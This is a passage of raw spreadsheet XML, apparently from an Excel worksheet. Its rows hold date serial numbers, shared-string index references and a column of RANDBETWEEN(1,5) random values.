    <row r="13934" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13934" s="1">
        <v>43256.687557870369</v>
      </c>
      <c r="C13934" t="s">
        <v>776</v>
      </c>
      <c r="E13934" s="2" t="s">
        <v>12499</v>
      </c>
      <c r="F13934">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13935" s="1">
        <v>43256.669675925928</v>
      </c>
      <c r="C13935" t="s">
        <v>10</v>
      </c>
      <c r="D13935" t="s">
        <v>80</v>
      </c>
      <c r="E13935" t="s">
        <v>12500</v>
      </c>
      <c r="F13935">
        <f t="shared" ca="1" si="217"/>
        <v>3</v>
      </c>
    </row>
    <row r="13936" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13936" s="1">
        <v>43256.661030092589</v>
      </c>
      <c r="C13936" t="s">
        <v>65</v>
      </c>
      <c r="E13936" s="2" t="s">
        <v>12501</v>
      </c>
      <c r="F13936">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13937" s="1">
        <v>43256.657488425924</v>
      </c>
      <c r="C13937" t="s">
        <v>10</v>
      </c>
      <c r="D13937" t="s">
        <v>36</v>
      </c>
      <c r="E13937" t="s">
        <v>12502</v>
      </c>
      <c r="F13937">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13938" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13938" s="1">
        <v>43256.648194444446</v>
      </c>
      <c r="C13938" t="s">
        <v>1130</v>
      </c>
      <c r="D13938" t="s">
        <v>56</v>
      </c>
      <c r="E13938" t="s">
        <v>12354</v>
      </c>
      <c r="F13938">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13939" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13939" s="1">
        <v>43256.630011574074</v>
      </c>
      <c r="C13939" t="s">
        <v>10</v>
      </c>
      <c r="D13939" t="s">
        <v>336</v>
      </c>
      <c r="E13939" t="s">
        <v>12503</v>
      </c>
      <c r="F13939">
        <f t="shared" ca="1" si="217"/>
        <v>3</v>
      </c>
    </row>
    <row r="13940" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A13940" s="1">
        <v>43256.602916666663</v>
      </c>
      <c r="C13940" t="s">
        <v>6</v>
      </c>
      <c r="D13940" t="s">
        <v>25</v>
      </c>
      <c r="E13940" s="2" t="s">
        <v>12504</v>
      </c>
      <c r="F13940">
        <f t="shared" ca="1" si="217"/>
        <v>3</v>
      </c>
    </row>
    <row r="13941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13941" s="1">
        <v>43256.578726851854</v>
      </c>
      <c r="C13941" t="s">
        <v>10</v>
      </c>
      <c r="D13941" t="s">
        <v>17</v>
      </c>
      <c r="E13941" t="s">
        <v>12505</v>
      </c>
      <c r="F13941">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13942" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13942" s="1">
        <v>43256.505856481483</v>
      </c>
      <c r="C13942" t="s">
        <v>10</v>
      </c>
      <c r="D13942" t="s">
        <v>92</v>
      </c>
      <c r="E13942" t="s">
        <v>12506</v>
      </c>
      <c r="F13942">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13943" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13943" s="1">
        <v>43256.503159722219</v>
      </c>
      <c r="C13943" t="s">
        <v>290</v>
      </c>
      <c r="E13943" t="s">
        <v>12507</v>
      </c>
      <c r="F13943">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13944" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13944" s="1">
        <v>43256.481226851851</v>
      </c>
      <c r="C13944" t="s">
        <v>60</v>
      </c>
      <c r="E13944" t="s">
        <v>12508</v>
      </c>
      <c r="F13944">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13945" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A13945" s="1">
        <v>43256.480925925927</v>
      </c>
      <c r="C13945" t="s">
        <v>65</v>
      </c>
      <c r="E13945" s="2" t="s">
        <v>12509</v>
      </c>
      <c r="F13945">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13946" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13946" s="1">
        <v>43256.467523148145</v>
      </c>
      <c r="C13946" t="s">
        <v>41</v>
      </c>
      <c r="F13946">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13947" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A13947" s="1">
        <v>43256.464745370373</v>
      </c>
      <c r="C13947" t="s">
        <v>454</v>
      </c>
      <c r="E13947" s="2" t="s">
        <v>12510</v>
      </c>
      <c r="F13947">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13948" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A13948" s="1">
        <v>43256.461469907408</v>
      </c>
      <c r="C13948" t="s">
        <v>10</v>
      </c>
      <c r="D13948" t="s">
        <v>374</v>
      </c>
      <c r="E13948" s="2" t="s">
        <v>12511</v>
      </c>
      <c r="F13948">
        <f t="shared" ca="1" si="217"/>
        <v>4</v>
      </c>
    </row>
    <row r="13949" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13949" s="1">
        <v>43256.459618055553</v>
      </c>
      <c r="C13949" t="s">
        <v>10</v>
      </c>
      <c r="D13949" t="s">
        <v>271</v>
      </c>
      <c r="E13949" s="2" t="s">
        <v>12512</v>
      </c>
      <c r="F13949">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13950" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13950" s="1">
        <v>43256.443738425929</v>
      </c>
      <c r="C13950" t="s">
        <v>10</v>
      </c>
      <c r="D13950" t="s">
        <v>36</v>
      </c>
      <c r="E13950" t="s">
        <v>12513</v>
      </c>
      <c r="F13950">
        <f t="shared" ca="1" si="217"/>
        <v>1</v>
      </c>
    </row>
    <row r="13951" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13951" s="1">
        <v>43256.435729166667</v>
      </c>
      <c r="C13951" t="s">
        <v>71</v>
      </c>
      <c r="E13951" t="s">
        <v>12514</v>
      </c>
      <c r="F13951">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13952" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A13952" s="1">
        <v>43256.432638888888</v>
      </c>
      <c r="C13952" t="s">
        <v>686</v>
      </c>
      <c r="E13952" s="2" t="s">
        <v>12515</v>
      </c>
      <c r="F13952">
        <f t="shared" ca="1" si="217"/>
        <v>2</v>
      </c>
    </row>
    <row r="13953" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13953" s="1">
        <v>43256.428969907407</v>
      </c>
      <c r="C13953" t="s">
        <v>10</v>
      </c>
      <c r="D13953" t="s">
        <v>222</v>
      </c>
      <c r="E13953" t="s">
        <v>12516</v>
      </c>
      <c r="F13953">
        <f t="shared" ca="1" si="217"/>
        <v>5</v>
      </c>
    </row>
    <row r="13954" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13954" s="1">
        <v>43256.406458333331</v>
      </c>
      <c r="C13954" t="s">
        <v>48</v>
      </c>
      <c r="E13954" t="s">
        <v>12517</v>
      </c>
      <c r="F13954">
        <f t="shared" ref="F13954:F14017" ca="1" si="218">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="13955" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13955" s="1">
        <v>43256.399201388886</v>
      </c>
      <c r="C13955" t="s">
        <v>10</v>
      </c>
      <c r="D13955" t="s">
        <v>112</v>
      </c>
      <c r="E13955" t="s">
        <v>12518</v>
      </c>
      <c r="F13955">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="13956" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13956" s="1">
        <v>43256.372164351851</v>
      </c>
      <c r="C13956" t="s">
        <v>14</v>
      </c>
      <c r="F13956">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13957" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A13957" s="1">
        <v>43256.36209490741</v>
      </c>
      <c r="C13957" t="s">
        <v>107</v>
      </c>
      <c r="D13957" t="s">
        <v>23</v>
      </c>
      <c r="E13957" s="2" t="s">
        <v>12519</v>
      </c>
      <c r="F13957">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="13958" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13958" s="1">
        <v>43256.361516203702</v>
      </c>
      <c r="C13958" t="s">
        <v>10</v>
      </c>
      <c r="D13958" t="s">
        <v>36</v>
      </c>
      <c r="E13958" t="s">
        <v>12520</v>
      </c>
      <c r="F13958">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13959" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13959" s="1">
        <v>43256.306076388886</v>
      </c>
      <c r="C13959" t="s">
        <v>10</v>
      </c>
      <c r="D13959" t="s">
        <v>86</v>
      </c>
      <c r="E13959" t="s">
        <v>12521</v>
      </c>
      <c r="F13959">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="13960" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13960" s="1">
        <v>43256.305173611108</v>
      </c>
      <c r="C13960" t="s">
        <v>41</v>
      </c>
      <c r="E13960" s="2" t="s">
        <v>58</v>
      </c>
      <c r="F13960">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="13961" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A13961" s="1">
        <v>43256.302199074074</v>
      </c>
      <c r="C13961" t="s">
        <v>107</v>
      </c>
      <c r="D13961" t="s">
        <v>41</v>
      </c>
      <c r="E13961" s="2" t="s">
        <v>12522</v>
      </c>
      <c r="F13961">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="13962" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13962" s="1">
        <v>43256.249780092592</v>
      </c>
      <c r="C13962" t="s">
        <v>461</v>
      </c>
      <c r="E13962" s="2" t="s">
        <v>12523</v>
      </c>
      <c r="F13962">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="13963" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13963" s="1">
        <v>43256.228472222225</v>
      </c>
      <c r="C13963" t="s">
        <v>41</v>
      </c>
      <c r="E13963" t="s">
        <v>12524</v>
      </c>
      <c r="F13963">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="13964" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13964" s="1">
        <v>43256.214189814818</v>
      </c>
      <c r="C13964" t="s">
        <v>65</v>
      </c>
      <c r="E13964" s="2" t="s">
        <v>12525</v>
      </c>
      <c r="F13964">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13965" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13965" s="1">
        <v>43256.20416666667</v>
      </c>
      <c r="C13965" t="s">
        <v>43</v>
      </c>
      <c r="E13965" t="s">
        <v>12526</v>
      </c>
      <c r="F13965">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="13966" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13966" s="1">
        <v>43256.199490740742</v>
      </c>
      <c r="C13966" t="s">
        <v>48</v>
      </c>
      <c r="E13966" t="s">
        <v>12527</v>
      </c>
      <c r="F13966">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="13967" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A13967" s="1">
        <v>43256.154710648145</v>
      </c>
      <c r="C13967" t="s">
        <v>43</v>
      </c>
      <c r="E13967" s="2" t="s">
        <v>12528</v>
      </c>
      <c r="F13967">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="13968" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13968" s="1">
        <v>43256.099039351851</v>
      </c>
      <c r="C13968" t="s">
        <v>41</v>
      </c>
      <c r="E13968" t="s">
        <v>12529</v>
      </c>
      <c r="F13968">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13969" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A13969" s="1">
        <v>43256.096261574072</v>
      </c>
      <c r="C13969" t="s">
        <v>41</v>
      </c>
      <c r="E13969" s="2" t="s">
        <v>12530</v>
      </c>
      <c r="F13969">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="13970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13970" s="1">
        <v>43256.081956018519</v>
      </c>
      <c r="C13970" t="s">
        <v>41</v>
      </c>
      <c r="E13970" t="s">
        <v>12531</v>
      </c>
      <c r="F13970">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="13971" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13971" s="1">
        <v>43256.045370370368</v>
      </c>
      <c r="C13971" t="s">
        <v>410</v>
      </c>
      <c r="D13971" t="s">
        <v>290</v>
      </c>
      <c r="E13971" s="2" t="s">
        <v>12532</v>
      </c>
      <c r="F13971">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="13972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13972" s="1">
        <v>43255.954027777778</v>
      </c>
      <c r="C13972" t="s">
        <v>41</v>
      </c>
      <c r="E13972" t="s">
        <v>12533</v>
      </c>
      <c r="F13972">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="13973" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13973" s="1">
        <v>43255.937824074077</v>
      </c>
      <c r="C13973" t="s">
        <v>139</v>
      </c>
      <c r="E13973" t="s">
        <v>12534</v>
      </c>
      <c r="F13973">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13974" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A13974" s="1">
        <v>43255.904074074075</v>
      </c>
      <c r="C13974" t="s">
        <v>1050</v>
      </c>
      <c r="D13974" t="s">
        <v>381</v>
      </c>
      <c r="E13974" s="2" t="s">
        <v>12535</v>
      </c>
      <c r="F13974">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13975" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13975" s="1">
        <v>43255.898032407407</v>
      </c>
      <c r="C13975" t="s">
        <v>7491</v>
      </c>
      <c r="D13975" t="s">
        <v>6</v>
      </c>
      <c r="E13975" s="2" t="s">
        <v>12536</v>
      </c>
      <c r="F13975">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13976" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13976" s="1">
        <v>43255.850138888891</v>
      </c>
      <c r="C13976" t="s">
        <v>144</v>
      </c>
      <c r="E13976" s="2" t="s">
        <v>12537</v>
      </c>
      <c r="F13976">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="13977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13977" s="1">
        <v>43255.813888888886</v>
      </c>
      <c r="C13977" t="s">
        <v>10</v>
      </c>
      <c r="D13977" t="s">
        <v>6</v>
      </c>
      <c r="E13977" t="s">
        <v>12538</v>
      </c>
      <c r="F13977">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="13978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13978" s="1">
        <v>43255.776087962964</v>
      </c>
      <c r="C13978" t="s">
        <v>10</v>
      </c>
      <c r="D13978" t="s">
        <v>11</v>
      </c>
      <c r="E13978" t="s">
        <v>12539</v>
      </c>
      <c r="F13978">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="13979" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13979" s="1">
        <v>43255.747824074075</v>
      </c>
      <c r="C13979" t="s">
        <v>10</v>
      </c>
      <c r="D13979" t="s">
        <v>89</v>
      </c>
      <c r="E13979" t="s">
        <v>12540</v>
      </c>
      <c r="F13979">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="13980" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13980" s="1">
        <v>43255.74596064815</v>
      </c>
      <c r="C13980" t="s">
        <v>586</v>
      </c>
      <c r="E13980" s="2" t="s">
        <v>12541</v>
      </c>
      <c r="F13980">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="13981" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13981" s="1">
        <v>43255.743472222224</v>
      </c>
      <c r="C13981" t="s">
        <v>720</v>
      </c>
      <c r="D13981" t="s">
        <v>993</v>
      </c>
      <c r="E13981" s="2" t="s">
        <v>12542</v>
      </c>
      <c r="F13981">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="13982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13982" s="1">
        <v>43255.722442129627</v>
      </c>
      <c r="C13982" t="s">
        <v>10</v>
      </c>
      <c r="D13982" t="s">
        <v>46</v>
      </c>
      <c r="E13982" t="s">
        <v>12543</v>
      </c>
      <c r="F13982">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="13983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13983" s="1">
        <v>43255.704317129632</v>
      </c>
      <c r="C13983" t="s">
        <v>280</v>
      </c>
      <c r="E13983" t="s">
        <v>12544</v>
      </c>
      <c r="F13983">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="13984" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A13984" s="1">
        <v>43255.693993055553</v>
      </c>
      <c r="C13984" t="s">
        <v>6</v>
      </c>
      <c r="D13984" t="s">
        <v>821</v>
      </c>
      <c r="E13984" s="2" t="s">
        <v>12545</v>
      </c>
      <c r="F13984">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="13985" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A13985" s="1">
        <v>43255.688888888886</v>
      </c>
      <c r="C13985" t="s">
        <v>10</v>
      </c>
      <c r="D13985" t="s">
        <v>192</v>
      </c>
      <c r="E13985" s="2" t="s">
        <v>12546</v>
      </c>
      <c r="F13985">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="13986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13986" s="1">
        <v>43255.684398148151</v>
      </c>
      <c r="C13986" t="s">
        <v>10</v>
      </c>
      <c r="D13986" t="s">
        <v>494</v>
      </c>
      <c r="E13986" t="s">
        <v>12547</v>
      </c>
      <c r="F13986">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13987" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13987" s="1">
        <v>43255.673541666663</v>
      </c>
      <c r="C13987" t="s">
        <v>10</v>
      </c>
      <c r="D13987" t="s">
        <v>494</v>
      </c>
      <c r="E13987" s="2" t="s">
        <v>12548</v>
      </c>
      <c r="F13987">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="13988" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13988" s="1">
        <v>43255.672372685185</v>
      </c>
      <c r="C13988" t="s">
        <v>10</v>
      </c>
      <c r="D13988" t="s">
        <v>112</v>
      </c>
      <c r="E13988" t="s">
        <v>12549</v>
      </c>
      <c r="F13988">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="13989" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A13989" s="1">
        <v>43255.649328703701</v>
      </c>
      <c r="C13989" t="s">
        <v>107</v>
      </c>
      <c r="D13989" t="s">
        <v>330</v>
      </c>
      <c r="E13989" s="2" t="s">
        <v>12550</v>
      </c>
      <c r="F13989">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="13990" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A13990" s="1">
        <v>43255.639456018522</v>
      </c>
      <c r="C13990" t="s">
        <v>16</v>
      </c>
      <c r="E13990" s="2" t="s">
        <v>12551</v>
      </c>
      <c r="F13990">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="13991" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A13991" s="1">
        <v>43255.638842592591</v>
      </c>
      <c r="C13991" t="s">
        <v>634</v>
      </c>
      <c r="D13991" t="s">
        <v>229</v>
      </c>
      <c r="E13991" s="2" t="s">
        <v>12552</v>
      </c>
      <c r="F13991">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13992" s="1">
        <v>43255.600995370369</v>
      </c>
      <c r="C13992" t="s">
        <v>10</v>
      </c>
      <c r="D13992" t="s">
        <v>271</v>
      </c>
      <c r="E13992" t="s">
        <v>12553</v>
      </c>
      <c r="F13992">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13993" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13993" s="1">
        <v>43255.593298611115</v>
      </c>
      <c r="C13993" t="s">
        <v>10</v>
      </c>
      <c r="D13993" t="s">
        <v>163</v>
      </c>
      <c r="E13993" s="2" t="s">
        <v>12554</v>
      </c>
      <c r="F13993">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="13994" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13994" s="1">
        <v>43255.57230324074</v>
      </c>
      <c r="C13994" t="s">
        <v>16</v>
      </c>
      <c r="E13994" s="2" t="s">
        <v>12555</v>
      </c>
      <c r="F13994">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="13995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13995" s="1">
        <v>43255.567766203705</v>
      </c>
      <c r="C13995" t="s">
        <v>10</v>
      </c>
      <c r="D13995" t="s">
        <v>721</v>
      </c>
      <c r="E13995" t="s">
        <v>12556</v>
      </c>
      <c r="F13995">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="13996" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A13996" s="1">
        <v>43255.558206018519</v>
      </c>
      <c r="C13996" t="s">
        <v>10</v>
      </c>
      <c r="D13996" t="s">
        <v>52</v>
      </c>
      <c r="E13996" s="2" t="s">
        <v>12557</v>
      </c>
      <c r="F13996">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="13997" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A13997" s="1">
        <v>43255.546215277776</v>
      </c>
      <c r="C13997" t="s">
        <v>10</v>
      </c>
      <c r="D13997" t="s">
        <v>163</v>
      </c>
      <c r="E13997" t="s">
        <v>12558</v>
      </c>
      <c r="F13997">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="13998" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A13998" s="1">
        <v>43255.525601851848</v>
      </c>
      <c r="C13998" t="s">
        <v>10</v>
      </c>
      <c r="D13998" t="s">
        <v>6</v>
      </c>
      <c r="E13998" s="2" t="s">
        <v>12559</v>
      </c>
      <c r="F13998">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="13999" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A13999" s="1">
        <v>43255.515069444446</v>
      </c>
      <c r="C13999" t="s">
        <v>10</v>
      </c>
      <c r="D13999" t="s">
        <v>14</v>
      </c>
      <c r="E13999" s="2" t="s">
        <v>12560</v>
      </c>
      <c r="F13999">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="14000" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14000" s="1">
        <v>43255.50408564815</v>
      </c>
      <c r="C14000" t="s">
        <v>10</v>
      </c>
      <c r="D14000" t="s">
        <v>222</v>
      </c>
      <c r="E14000" t="s">
        <v>12561</v>
      </c>
      <c r="F14000">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="14001" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A14001" s="1">
        <v>43255.482673611114</v>
      </c>
      <c r="C14001" t="s">
        <v>10</v>
      </c>
      <c r="D14001" t="s">
        <v>20</v>
      </c>
      <c r="E14001" s="2" t="s">
        <v>12562</v>
      </c>
      <c r="F14001">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="14002" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A14002" s="1">
        <v>43255.429409722223</v>
      </c>
      <c r="C14002" t="s">
        <v>10</v>
      </c>
      <c r="D14002" t="s">
        <v>163</v>
      </c>
      <c r="E14002" s="2" t="s">
        <v>12563</v>
      </c>
      <c r="F14002">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="14003" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14003" s="1">
        <v>43255.398530092592</v>
      </c>
      <c r="C14003" t="s">
        <v>10</v>
      </c>
      <c r="D14003" t="s">
        <v>6</v>
      </c>
      <c r="E14003" t="s">
        <v>12564</v>
      </c>
      <c r="F14003">
        <f t="shared" ca="1" si="218"/>
        <v>4</v>
      </c>
    </row>
    <row r="14004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14004" s="1">
        <v>43255.376377314817</v>
      </c>
      <c r="C14004" t="s">
        <v>10</v>
      </c>
      <c r="D14004" t="s">
        <v>80</v>
      </c>
      <c r="E14004" t="s">
        <v>12565</v>
      </c>
      <c r="F14004">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="14005" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A14005" s="1">
        <v>43255.372754629629</v>
      </c>
      <c r="C14005" t="s">
        <v>173</v>
      </c>
      <c r="E14005" s="2" t="s">
        <v>12566</v>
      </c>
      <c r="F14005">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="14006" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14006" s="1">
        <v>43255.369363425925</v>
      </c>
      <c r="C14006" t="s">
        <v>776</v>
      </c>
      <c r="E14006" t="s">
        <v>12567</v>
      </c>
      <c r="F14006">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="14007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14007" s="1">
        <v>43255.300891203704</v>
      </c>
      <c r="C14007" t="s">
        <v>10</v>
      </c>
      <c r="D14007" t="s">
        <v>36</v>
      </c>
      <c r="E14007" t="s">
        <v>12568</v>
      </c>
      <c r="F14007">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="14008" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A14008" s="1">
        <v>43255.300509259258</v>
      </c>
      <c r="C14008" t="s">
        <v>344</v>
      </c>
      <c r="E14008" s="2" t="s">
        <v>12569</v>
      </c>
      <c r="F14008">
        <f t="shared" ca="1" si="218"/>
        <v>3</v>
      </c>
    </row>
    <row r="14009" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A14009" s="1">
        <v>43255.244270833333</v>
      </c>
      <c r="C14009" t="s">
        <v>318</v>
      </c>
      <c r="E14009" s="2" t="s">
        <v>12570</v>
      </c>
      <c r="F14009">
        <f t="shared" ca="1" si="218"/>
        <v>2</v>
      </c>
    </row>
    <row r="14010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14010" s="1">
        <v>43255.241446759261</v>
      </c>
      <c r="C14010" t="s">
        <v>41</v>
      </c>
      <c r="E14010" t="s">
        <v>12571</v>
      </c>
      <c r="F14010">
        <f t="shared" ca="1" si="218"/>
        <v>5</v>
      </c>
    </row>
    <row r="14011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14011" s="1">
        <v>43255.220995370371</v>
      </c>
      <c r="C14011" t="s">
        <v>318</v>
      </c>
      <c r="E14011" t="s">
        <v>12572</v>
      </c>
      <c r="F14011">
        <f t="shared" ca="1" si="218"/>
        <v>1</v>
      </c>
    </row>
    <row r="14012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A14012" s="1">
        <v>43255.220648148148</v>
      </c>
      <c r="C14012" t="s">
        <v>60</v>
      </c>
      <c r="F14012">
